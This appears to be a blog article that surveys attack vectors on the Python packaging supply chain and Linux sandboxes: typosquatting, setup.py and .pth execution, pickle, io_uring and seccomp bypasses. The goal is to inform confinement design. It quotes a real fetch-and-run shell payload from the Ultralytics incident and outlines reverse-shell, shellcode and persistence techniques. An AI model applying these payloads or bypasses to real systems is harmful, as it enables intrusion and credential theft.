🤖 Attack vectors against the Python/PyPI supply chain and Linux execution environments

Python’s packaging ecosystem faces a vast and growing attack surface spanning the entire lifecycle from package publication through runtime execution. This taxonomy documents over 100 distinct attack vectors organized across 11 categories, drawn from real-world incidents (2023–2025), published CVEs, and security research. The threat is not theoretical: PyPI receives over 500 malware reports per month, was forced to suspend new registrations four times between 2023–2024, and the landmark Ultralytics compromise in December 2024 demonstrated how a single CI/CD injection could deliver cryptominers to 10% of scanned cloud environments. These vectors range from trivial typosquats to sophisticated kernel-level bypasses, and understanding the full taxonomy is essential for evaluating any confinement architecture.


1. Supply chain attacks on PyPI packages

The PyPI ecosystem’s flat namespace, permissive publishing model, and massive scale (~600,000 projects) create a broad attack surface for supply chain compromise. Attack vectors in this category target the trust relationship between package publishers and consumers.

Typosquatting remains the most common vector. Attackers register package names that are slight misspellings of popular packages (e.g., requestss for requests, jeIlyfish using uppercase-I for lowercase-L). In March 2024, 566 typosquatted packages were deployed in a single campaign, forcing PyPI to suspend registrations. A newer variant called slopsquatting registers names that AI coding assistants hallucinate—research indicates 20–35% of hallucinated Python package names were weaponized in 2023.

Dependency confusion exploits the collision between internal/private package names and public PyPI. When pip --extra-index-url checks both private and public registries, it installs whichever has the highest version number. Alex Birsan’s 2021 research breached 35+ companies including Apple and Microsoft. The PyTorch torchtriton incident (December 2022) demonstrated real exploitation, stealing SSH keys and environment variables.

Compromised build pipelines represent the most sophisticated vector. The Ultralytics YOLO compromise (December 4–7, 2024) exploited a GitHub Actions script injection vulnerability: the attacker crafted malicious branch names in draft pull requests containing shell payloads like $({curl,-sSfL,<url>}${IFS}|${IFS}bash), which executed during CI/CD, injecting XMRig cryptominers into four PyPI releases. The package had ~60 million total downloads.

Account takeovers target maintainer credentials through phishing (fake domains like pypi-mirror[.]org), credential stuffing, and expired email domain hijacking. PyPI invalidated ~1,800 accounts with expired email domains and mandated 2FA for all maintainers by January 2024.

Malicious maintainers build legitimate packages, then inject malicious code. The aiocpa package (November 2024) was a genuine Crypto Pay API client whose own maintainer introduced obfuscated credential-stealing code only in the PyPI-published version—the GitHub repository remained clean.

Revival hijacking exploits the fact that deleted PyPI package names become immediately available. JFrog identified 120,000+ removed packages at risk, with ~22,000 still actively referenced. Their proof-of-concept “security holding” packages accumulated 200,000 downloads in three months, demonstrating the threat’s reality.

Star-jacking links malicious packages to popular GitHub repositories. PyPI displays the linked repository’s star count without validation. Analysis shows 3.03% of all PyPI packages have non-unique Git references. Namespace squatting exploits PyPI’s lack of organizational scoping (unlike npm’s @org/package), and protestware involves maintainers deliberately sabotaging their own packages, as seen with the atomicwrites deletion in 2022.


2. Binary and wheel-level attacks

Wheel packages can bundle compiled binaries that evade Python-focused security scanners entirely. These vectors exploit the opacity of native code.

Injected shared libraries in manylinux wheels represent a potent vector. The auditwheel repair tool copies system .so files into wheels and sets RPATH to $ORIGIN/.libs_*. A malicious .so using __attribute__((constructor)) executes code the moment the library loads—before any Python code runs. The termncolor/colorinal packages (2025) dropped terminate.so on Linux systems for backdoor functionality.

Modified Python bytecode files hide payloads in opaque .pyc files that most security tools cannot scan. The fshec2 package (April 2023, discovered by ReversingLabs) was the first known supply chain attack using compiled bytecode to evade detection. It shipped full.pyc containing C2 functionality for downloading commands and establishing cron-job persistence. Multiple layers of obfuscation using marshal.loads() and exec() create nested encryption that tools cannot statically analyze.

Trojanized compiled dependencies bundled in wheels exploit the same pattern as the xz-utils backdoor (CVE-2024-3094)—the definitive example of this class. The attacker spent ~3 years gaining maintainer trust, then inserted malicious code hidden in binary test files that was extracted during build, modifying liblzma.so to hijack OpenSSL’s RSA_public_decrypt via glibc’s IFUNC mechanism. This pattern is directly replicable in Python wheel builds.

ELF binary manipulation includes adding parasitic code in section padding (code caves), modifying PLT/GOT entries to redirect calls, and symbol table poisoning via IFUNC resolvers. Malicious RPATH/RUNPATH settings can force loading of attacker-controlled libraries by pointing to writable directories, and since RPATH is checked before LD_LIBRARY_PATH, it cannot be overridden by users.

Steganographic payloads hide malicious code in binary data files. Checkmarx discovered 27 malicious PyPI packages (November 2023) using steganography in image files. Phylum found a package shipping a 17MB PNG with a Go binary (Sliver C2 agent) appended after the image’s end-of-file marker. Platform-specific payload activation checks platform.system() or /proc/self/cgroup to trigger only on Linux, as seen in ESET’s analysis of 116 malicious packages deploying different backdoors per OS.


3. Source-level attacks

Python’s dynamic nature provides numerous mechanisms for hiding malicious code in plain sight within source files.

Obfuscated malicious code is the dominant pattern. Common techniques include base64 + exec chains, Fernet encryption (used in the March 2024 campaign of 500+ packages), multi-layer marshal/compile obfuscation, and nested encoding with variable names like magic, love, god, destiny (JFrog’s “noblesse” family, ~30,000 downloads). The simple-mali-pkg package contained dozens of layers of encryption hiding an infostealer.

Trojan source attacks (CVE-2021-42574) use Unicode bidirectional control characters to make code appear different from how it executes. Invisible characters like U+2067 (Right-to-Left Isolate) reorder displayed text, making security checks appear present during review while actually being commented out. Homoglyph attacks (CVE-2021-42694) replace Latin characters with visually identical Unicode characters from other scripts—a function hаshPassword with Cyrillic ‘а’ is entirely different from hashPassword with Latin ‘a’.

Hidden code in __init__.py exploits automatic execution on import. Attackers use massive horizontal whitespace to push malicious code off-screen (the trojanized colorama technique), or place payloads deep in subpackage init files. Code hidden in docstrings uses exec(function.__doc__) to execute what appears to be documentation. Malicious decorators silently exfiltrate function arguments (the aiocpa attack wrapped the CryptoPay constructor to steal credentials), while malicious metaclasses propagate through entire class hierarchies via inheritance.

Polyglot files are valid in multiple formats simultaneously. A file can function as both a Python script and a shell script, or both a valid image and an executable. The xz-utils attack decoded binary test data files via shell scripts during build—a form of polyglot abuse. A critical cross-cutting vector is the wheel-vs-source discrepancy: ESET discovered campaigns where the source distribution is clean but the wheel contains malicious code, and pip prefers wheels by default.


4. Runtime and memory attacks

CPython’s C implementation presents a rich surface for memory corruption and runtime manipulation, particularly through C extensions and the interpreter’s internal data structures.

CPython’s pymalloc allocator lacks standard heap mitigations—no double-free detection, no canaries, no address validation. Research by tin-z (2023) demonstrated that double-free is trivially exploitable: freeing a block twice yields two allocations to the same memory, enabling an arbitrary write primitive. The allocator’s pymalloc_free() performs only address_in_range() checks.

ROP/JOP gadget chains are practical against CPython. A statically-linked Python binary provides 10,000+ usable gadgets. CPython’s extensive use of function pointer tables (tp_call, tp_getattr in PyTypeObject) provides natural indirect call sites for JOP attacks. Known CVEs enabling these chains include CVE-2021-3177 (buffer overflow in _ctypes/callproc.c), CVE-2016-5636 (integer overflow in zipimport.c), and CVE-2023-40217 (heap use-after-free in unicodeobject.c).

Python object corruption targets the two critical fields at the start of every PyObject: ob_refcnt (offset 0) and ob_type (offset 8). Changing ob_type causes type confusion with controlled memory layout interpretation. Decrementing ob_refcnt to zero triggers premature deallocation, creating use-after-free. The 35C3 CTF “Collection” challenge demonstrated crafting fake bytearray objects in heap memory for arbitrary read/write.

ctypes provides unrestricted memory access from pure Python: ctypes.string_at(address, length) for arbitrary reads, ctypes.memmove(target, source, length) for writes, and ctypes.CFUNCTYPE(c_int)(address)() for calling arbitrary function pointers. Combined with mmap, attackers create executable memory regions and run shellcode entirely from Python. On /proc/self/mem, writes bypass memory protections entirely—the kernel treats them like ptrace, allowing writes to read-only and executable pages. The dlinject tool demonstrates injecting shared libraries into running processes through this mechanism.

Data-only attacks modify Python’s internal data structures without code injection. The DIMVA 2018 paper “Bytecode Corruption Attacks Are Real” demonstrated four strategies: overwriting bytecode strings, corrupting bytecode pointers, manipulating function hash maps, and injecting native function calls. Frame object manipulation exploits LOAD_FAST‘s lack of bounds checking (demonstrated by JuliaPoo, 2021) to read arbitrary PyObject* pointers from memory relative to the frame, achieving arbitrary read primitives.

PaX/grsecurity’s MPROTECT blocks mmap-based shellcode execution and JIT spray by preventing RWX memory creation. However, Python requires MPROTECT exceptions because libffi uses RWX trampolines for ctypes/cffi. With MPROTECT enabled, ctypes shellcode injection and mmap-based attacks are blocked, but data-only attacks, bytecode manipulation, and /proc/self/mem writes remain viable.


5. Filesystem and network attacks

Once malicious Python code achieves execution, the filesystem and network provide the primary channels for damage and exfiltration.

Credential and token theft is the most common payload in real-world PyPI malware. The fabrice package (typosquat of fabric, live since 2021, 37,000+ downloads) exfiltrated AWS credentials on Linux. The W4SP Stealer campaign stole browser cookies, Discord tokens, and crypto wallet data. Twenty “time”-related packages (March 2025) specifically targeted cloud access tokens for AWS, Alibaba Cloud, and Tencent Cloud with 14,100+ downloads.

Reverse shells are deployed by numerous malicious packages. The canonical Python reverse shell uses socket.connect() + os.dup2() + subprocess.call(["/bin/sh"]). The importantpackage used a novel technique: C2 traffic routed via HTTPS to pypi.python.org, then rerouted by Fastly CDN to the actual C2 server, making traffic indistinguishable from legitimate PyPI communication. MCP server packages (2025) ran reverse shells before starting the MCP server, exploiting the emerging AI tool chain.

DNS-based exfiltration encodes stolen data in DNS query subdomain labels. The ipboards and pptest packages (2021, discovered by JFrog) were the first documented PyPI packages using DNS tunneling for covert data exfiltration. This technique passes through most firewalls unmonitored.

Persistence mechanisms deployed by real PyPI malware include:

  • SSH authorized_keys injection: adding attacker public keys for persistent remote access (TeamTNT campaigns)
  • Cron job injection: the fshec2 package established cron-based persistence on Linux
  • .bashrc/.profile modification: commands execute invisibly on every shell open
  • Git hook injection: pre-commit/post-merge hooks execute during git operations
  • pip.conf modification: redirecting all future pip install commands to attacker repositories

Symlink attacks exploit TOCTOU race conditions. CVE-2025-68146 in the filelock library (used by virtualenv, PyTorch, poetry, tox) allowed symlink attacks with a race window of ~1–5 microseconds, succeeding in 1–3 attempts. Privilege escalation via Python capabilities (cap_setuid+ep → instant root shell), SUID exploitation, and PATH hijacking are well-documented in Linux privilege escalation guides (GTFOBins).


6. IPC and inter-process attacks

Malicious Python code can attack other processes through Linux’s numerous IPC mechanisms.

Pickle deserialization attacks are the most critical IPC vector. The __reduce__() method returns a callable and arguments that pickle invokes during deserialization—pickle.loads(malicious_data) achieves arbitrary code execution trivially. This extends to dill, jsonpickle, shelve, and marshal. PyYAML’s yaml.load() without Loader=SafeLoader allows arbitrary object construction. ML model files (.pkl) are a growing attack vector—weaponized PyTorch and scikit-learn models can execute code on load.

Unix domain socket hijacking is particularly dangerous when Docker’s socket (/var/run/docker.sock) is accessible—writable access enables full container creation with host filesystem mounts for trivial root escalation. Abstract namespace sockets (prefixed with ) have no filesystem permissions—any process in the same network namespace can connect, and they cannot be protected by ACLs.

D-Bus message injection targets privileged system services. CVE-2015-8612 in blueman passed user input to eval() without sanitization—any local user could execute code as root. The USBCreator D-Bus vulnerability on Ubuntu allowed arbitrary file overwrite as root without a password.

Shared memory attacks via /dev/shm (world-writable tmpfs) and mmap can read or corrupt data structures of other processes. shm_open() creates segments with default permissions 0666, readable and writable by any user. Ptrace-based process injection uses PTRACE_ATTACH → PTRACE_POKETEXT → PTRACE_SETREGS to inject shellcode into running processes (MITRE ATT&CK T1055.008), though ptrace_scope=1 (default on modern distros) restricts this to parent-child relationships.

Environment variable injection to child processes poisons LD_PRELOAD, PYTHONPATH, PATH, and http_proxy/https_proxy, redirecting all child process behavior through attacker-controlled configurations. Clipboard hijacking via X11 monitors for cryptocurrency address patterns and replaces them with attacker wallets—the forenitq package family implemented this using pyperclip.


7. Side-channel attacks

Even confined processes can leak information through observable side effects of computation.

Timing attacks against Python’s default string comparison (==) with early termination create measurable side channels for recovering secrets byte-by-byte. The Keyczar HMAC implementation was bypassed with ~1000 queries per byte over localhost TCP. Python added hmac.compare_digest() in 3.3 as mitigation, but many applications still use == for secret comparison.

Cache-based side channels (Flush+Reload, Prime+Probe) exploit the ~100Ă— timing difference between cache hits and misses. Python processes sharing libssl.so pages are susceptible—CacheBleed (CVE-2016-0702) demonstrated timing attacks on OpenSSL’s constant-time RSA implementation. Microarchitectural attacks (Spectre, Meltdown) affect Python processes whose secrets reside in memory accessible to speculative execution.

Covert channels within permitted resource envelopes are the most relevant for sandbox evasion. The Comprezzor research (2021) demonstrated memory compression timing side channels achieving 643.25 bits/hour over 14 internet hops, leaking secrets from PostgreSQL via a Python-Flask application. CPU timing modulation, memory pressure signaling, and filesystem metadata channels (inode allocation patterns, stat() timestamps) all operate within normal resource envelopes.

/proc-based information leakage is particularly powerful: /proc/[pid]/maps defeats ASLR by revealing base addresses, /proc/[pid]/environ exposes environment variables with API keys, and /proc/[pid]/stat leaks instruction and stack pointer values. Resource exhaustion side channels include hash collision DoS (CVE-2012-1150), which revealed hash function seeds through O(n²) dict operations, prompting Python’s hash randomization (PYTHONHASHSEED).


8. Installation-time attacks

Installation is the single most dangerous phase in the Python package lifecycle. 56% of documented malicious pip packages execute during installation via setup.py, not at import time.

setup.py arbitrary code execution is the most exploited mechanism. The setup.py file runs with the installing user’s privileges when pip processes source distributions. Common patterns override the install command class: cmdclass={'install': MaliciousInstall}. Critically, even pip download (not install) triggers setup.py execution for metadata extraction via egg_info. The March 2024 campaign used Fernet-encrypted payloads in setup.py across 500+ packages.

PEP 517 build backend exploitation allows malicious packages to specify custom build backends in pyproject.toml that execute arbitrary code. The build-backend can reference in-tree code via backend-path, and even metadata retrieval (prepare_metadata_for_build_wheel) triggers execution. PEP 643 “Dynamic” metadata entries ensure pip must build the package for metadata, guaranteeing code execution persists with modern build systems. An attacker needs only a single source distribution anywhere in the dependency graph.

Lock file poisoning was demonstrated by Phylum’s “Bad Beat Poetry” research: a malicious package added via poetry add --lock creates complex lockfile changes that are difficult to review, and if the manifest entry is later removed without regenerating the lockfile, the malicious dependency persists. Egg-info manipulation uses cmdclass={'egg_info': MaliciousCommand} to execute during metadata generation—even operations intended as “safe” like pip download trigger this code path.

Wheels (.whl files) do NOT execute setup.py and are fundamentally safer—pip prefers wheels when available. However, not all packages have wheel distributions, and an attacker needs only one source distribution in the entire dependency tree to achieve code execution.


9. Import and loading-time attacks

Python’s extensible import system provides numerous injection points, several of which have been exploited in real-world attacks.

.pth file injection is the most critical vector. Files ending in .pth in site-packages are processed during interpreter startup, and lines beginning with import are executed as Python code. In CVE-2024-3400 (Palo Alto GlobalProtect zero-day), attackers deployed a backdoor via /usr/lib/python3.6/site-packages/system.pth containing base64-encoded malware that ran whenever any Python code imported a module. MITRE catalogs this as T1546.018 (“Event Triggered Execution: Python Startup Hooks”). CPython issue #78125 acknowledged that “pth files are evil.”

Import hook manipulation via sys.meta_path intercepts any import statement before filesystem lookup. An attacker’s custom finder inserted at position 0 can shadow any module, including the standard library. sitecustomize.py and usercustomize.py execute automatically at interpreter startup—placing either file anywhere on sys.path runs arbitrary code with no user interaction.

sys.path poisoning exploits Python’s insertion of '' (current working directory) at sys.path[0] by default. Combined with SUID scripts or sudo-executed Python, an attacker places a shadow module (e.g., webbrowser.py) in a writable directory that spawns a root shell. Python 3.11 added the -P flag and PYTHONSAFEPATH to mitigate this.

Cached bytecode poisoning replaces .pyc files in __pycache__/. If the attacker matches the header’s magic number, timestamp, and source file size (obtainable via stat), Python loads the poisoned bytecode without recompiling. PEP 552 hash-based validation exists but is not enabled by default for performance reasons.

Codec registration attacks exploit codecs.register() search functions called during encoding/decoding. The # -*- coding: evil_codec -*- source file declaration triggers codec lookup at parse time before any code executes. PYTHONPATH poisoning prepends attacker directories to sys.path, redirecting all imports. Python’s -E flag and -I (isolated) mode disable PYTHON* environment variables as mitigation.

Entry point exploitation targets plugin auto-discovery: a malicious package declaring entry points matching a framework’s plugin groups (e.g., pytest11) executes automatically when the host application loads plugins, without the user ever importing the malicious package directly.


10. Dependency-based attacks

Dependency resolution introduces attack vectors distinct from those targeting individual packages.

Transitive dependency hijacking targets indirect dependencies deep in the tree. The cappership Solana campaign (January 2025) published semantic-types as initially benign, then introduced malware. Five other Solana-related packages depended on it, ensuring any installation pulled the hidden payload. Combined downloads exceeded 25,900. The Ultralytics compromise similarly impacted downstream projects ComfyUI, SwarmUI, and adetailer through transitive dependencies.

Version pinning attacks exploit loose specifications like >=1.0 or ~=1.0. Revival hijack attackers use extremely high version numbers (e.g., 9999.0.0) to guarantee installation by any system running pip install --upgrade. Dependency tree manipulation crafts packages with install_requires specifications designed to pull in malicious sub-dependencies through chains of seemingly unrelated packages.

Lock file poisoning targets poetry.lock, Pipfile.lock, and requirements.txt. Phylum demonstrated that poetry add --lock introduces complex, hard-to-review changes, and malicious entries can persist even after manifest cleanup if the lockfile isn’t regenerated. Requirements file manipulation through compromised repositories or CI/CD systems adds malicious dependencies that may not receive the same scrutiny as application code changes.


11. Kernel and LSM bypass attacks

For confined Python execution environments on hardened Linux, kernel-level bypasses represent the final escalation path.

io_uring is the most significant bypass vector. It performs I/O through shared ring buffers without making traditional syscalls, evading seccomp filters entirely. With 61 supported operations including file read/write and network connect/send/recv, ARMO’s “Curing” rootkit demonstrated full C2 functionality that evaded Falco, Microsoft Defender, and other runtime security tools. Google reported that 60% of kernel exploits submitted to their bug bounty in 2022 targeted io_uring. Docker’s default seccomp profile now blocks io_uring_setup.

Landlock LSM has documented limitations. It cannot restrict chdir(2), stat(2), flock(2), chmod(2), chown(2), setxattr(2), utime(2), ioctl(2), fcntl(2), or access(2). A sandboxed process can enumerate the filesystem via stat() and change working directories freely. Network restrictions were absent before ABI v4 (kernel 6.4), and abstract Unix socket scoping was added only in ABI v6 (kernel 6.12). Landlock’s 16-layer stacking limit can be exhausted in deeply nested sandbox environments.

seccomp bypass techniques beyond io_uring include:

  • Architecture confusion: On x86-64, using int 0x80 to invoke 32-bit syscall ABI where syscall numbers map differently, bypassing filters that don’t check the seccomp_data.arch field
  • SECCOMP_RET_USER_NOTIF TOCTOU: The kernel documentation explicitly warns this mechanism “can NOT be used to implement a security policy” due to inherent race conditions between argument inspection and syscall execution
  • Creative syscall chaining: When read() is blocked, mmap(MAP_POPULATE), sendfile(), splice(), copy_file_range(), and process_vm_readv() provide alternative data access paths

SELinux escapes include AVC cache manipulation (overwriting state->initialized to false bypasses all permission checks), io_setup() bypassing PROCESS__EXECMEM restrictions (CVE-2016-4997), and ioctl whitelisting gaps—the SELinux reference policy still doesn’t whitelist ioctls (GitHub issue #76), meaning any process allowed ioctl can issue any ioctl command.

Container escapes with recent CVEs include CVE-2024-21626 (runc FD leak, 80% of cloud environments vulnerable per Wiz), CVE-2025-31133 (runc symlink during container creation), and CVE-2022-0492 (cgroup release_agent, blocked by SELinux). eBPF exploitation provides local privilege escalation via verifier bugs (CVE-2020-8835, CVE-2022-23222, CVE-2025-0009), mitigated by kernel.unprivileged_bpf_disabled=1.

PaX/grsecurity on Gentoo provides MPROTECT (strict W^X), enhanced ASLR (RANDMMAP with 33+ bits entropy), and RAP (control-flow integrity). However, Python requires MPROTECT exceptions because libffi uses RWX trampolines for ctypes/cffi—either EMUTRAMP must be enabled or MPROTECT disabled on the Python binary, significantly reducing effective protection. Data-only attacks, bytecode manipulation, and /proc/self/mem writes remain viable under full PaX enforcement.


Conclusion

Three structural insights emerge from this taxonomy. First, installation time is the critical vulnerability—setup.py execution, PEP 517 build backends, and even metadata extraction trigger arbitrary code, and a single source distribution anywhere in the dependency graph is sufficient. Any confinement architecture must treat installation as an untrusted operation requiring full sandboxing. Second, the Python interpreter itself undermines OS-level protections: ctypes provides unrestricted memory access, /proc/self/mem bypasses page permissions, id() leaks ASLR information by design, and libffi’s trampoline mechanism conflicts with W^X enforcement. Confinement must account for Python’s privileged relationship with the underlying system. Third, attack sophistication is escalating rapidly: from simple typosquats in 2022 to CI/CD pipeline injection (Ultralytics), compiled bytecode evasion (fshec2), steganographic payloads in images, and year-long sleeper packages (JarkaStealer). The io_uring bypass of both seccomp and LSM hooks, combined with Landlock’s documented syscall gaps and SELinux’s ioctl whitelisting deficiencies, means no single Linux security mechanism provides complete confinement—effective defense requires defense in depth across all 11 categories documented here.

Leave a Reply

Your email address will not be published. Required fields are marked *